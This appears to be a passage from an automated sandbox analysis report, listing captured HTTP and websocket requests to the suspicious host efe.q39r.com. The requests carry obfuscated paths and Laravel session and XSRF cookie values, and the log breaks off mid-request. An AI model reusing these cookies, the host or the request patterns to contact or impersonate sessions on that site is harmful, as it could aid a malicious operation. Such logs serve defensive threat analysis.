XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: efe.q39r.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://efe.q39r.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3DSec-WebSocket-Key: auTwnBOXmEbtU7werxzLsA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /uvZWUFt0UROOoXt5vmcKSao6QR2TqrxxiF9by3n8nEXUy2s5T34126 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opz2A7ILaAyWzSXkUtICNncurtvkgh8DhYFpMx2Oxlzsq9KrZPNl45140 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opkZKWoBXgK4XlaBoarjPDswkBdr2NIUBC8D3VyslijyXn8FWJLDbkTI32Kpccd196 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQGAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mn2YUCVnR8vQa9aF2S75S9IkijyLIGjmjHd6iKoP0ehtuyRPp90150 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 